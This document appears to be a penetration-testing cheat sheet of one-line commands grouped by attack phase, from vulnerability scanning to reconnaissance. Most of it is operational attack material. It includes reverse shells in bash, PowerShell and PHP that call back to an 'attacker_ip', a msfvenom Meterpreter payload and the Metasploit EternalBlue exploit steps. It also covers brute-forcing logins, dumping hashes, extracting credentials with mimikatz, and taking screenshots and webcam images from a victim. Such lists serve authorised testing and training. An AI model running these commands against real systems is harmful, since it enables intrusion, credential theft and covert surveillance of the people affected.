01 Vulnerability Scanning

🔍 Web Scanners

Web server vulnerability scanner:
    nikto -h http://target.com
Scan WordPress for vulnerabilities:
    wpscan --url http://target.com
Fast CVE scanning with templates:
    nuclei -t cves/ -u http://target.com
Fast web path and directory scanner:
    dirsearch -u http://target.com

💉 App & Injection Scanners

Detect SQL injection and enumerate databases:
    sqlmap -u "http://target.com/page.php?id=1" --dbs
Fast directory brute-force:
    gobuster dir -u http://target.com -w wordlist.txt
Automatic XSS injection framework:
    xsser --all=http://target.com

🛡️ System & Local Scans

Search local exploit database:
    searchsploit apache 2.4
Start OpenVAS vulnerability scanner:
    openvas-start
Full system security audit:
    lynis audit system
Nmap vulnerability script scan:
    nmap --script vuln target.com
02 System Access & Reverse Shells

🐚 Native Shells & Listeners

Start netcat listener:
    nc -lvnp 4444
Upgrade to an interactive shell (PTY):
    python3 -c 'import pty; pty.spawn("/bin/bash")'
Bash reverse shell:
    bash -i >& /dev/tcp/attacker_ip/4444 0>&1
Socat bind shell (listener executing bash):
    socat TCP4-LISTEN:4444,fork EXEC:/bin/bash

💻 Scripting Shells & Payloads

PowerShell reverse shell:
    powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('attacker_ip',4444);"
PHP reverse shell:
    php -r '$sock=fsockopen("attacker_ip",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
Create Meterpreter payload executable:
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -f exe > shell.exe
03 Password Attacks

🔓 Online Brute-Force

Brute-force HTTP login:
    hydra -l admin -P rockyou.txt target.com http-get
Network authentication cracking (SSH/RDP):
    ncrack -p 22 --user admin --pass wordlist.txt target.com
Fast parallel brute-forcer:
    medusa -h
SSH brute-force:
    patator ssh_login host=ip user=FILE0 password=FILE1 0=user.txt 1=pass.txt

🔑 Offline Cracking & Wordlists

Crack password hashes:
    john --wordlist=rockyou.txt hash.txt
GPU-based password cracking (mode 0 = MD5):
    hashcat -m 0 hash.txt rockyou.txt
Generate wordlist from website content:
    cewl http://target.com -w wordlist.txt
Create custom wordlists (length 6 to 10 from the given charset):
    crunch 6 10 abcdef1234
Crack ZIP passwords:
    fcrackzip -u -D -p rockyou.txt file.zip
04 Post-Exploitation

🛠️ System & Privileges

Show current user:
    meterpreter > getuid
View running processes:
    ps
List users on Windows:
    wmic useraccount list brief
Check active connections and ports:
    netstat -ano
Check user sudo permissions:
    sudo -l
Privilege escalation enumeration script:
    linpeas.sh

👁️ Data & Credential Exfiltration

Extract password hashes:
    meterpreter > hashdump
Host files via Python HTTP server:
    python3 -m http.server 80
Extract credentials on Windows:
    mimikatz
Take a screenshot from the victim:
    meterpreter > screenshot
Capture image from webcam:
    meterpreter > webcam_snap
05 Exploitation

🎯 Metasploit Framework

Launch Metasploit Framework:
    msfconsole
Search Metasploit for Windows exploits:
    search type:exploit platform:windows
Select the EternalBlue exploit module:
    use exploit/windows/smb/ms17_010_eternalblue
Set remote host target:
    set RHOST target_ip
Set Meterpreter payload:
    set PAYLOAD windows/meterpreter/reverse_tcp
Execute exploit:
    run

Custom & Public Exploits

Search for proof-of-concept exploits:
    exploit-db.com
Run custom exploit scripts:
    python3 exploit.py
Compile C exploit:
    gcc exploit.c -o exploit
Mirror (copy) an exploit by ID into the current folder:
    searchsploit -m 12345
06 Information Gathering

🔎 Network & DNS Recon

SYN (stealth) scan with OS & service detection:
    nmap -sS -A target.com
Domain WHOIS information:
    whois target.com
DNS enumeration:
    dnsenum target.com
Resolve hostname to IP:
    nslookup target.com

🌐 Web & OSINT

Automated OSINT reconnaissance framework:
    recon-ng
Email & subdomain gathering via search engines:
    theharvester -d target.com -b all
Detect technologies and server info:
    whatweb http://target.com
Directory brute-forcing:
    dirb http://target.com/
Fast web fuzzer (directories/files):
    ffuf -w wordlist.txt -u http://target.com/FUZZ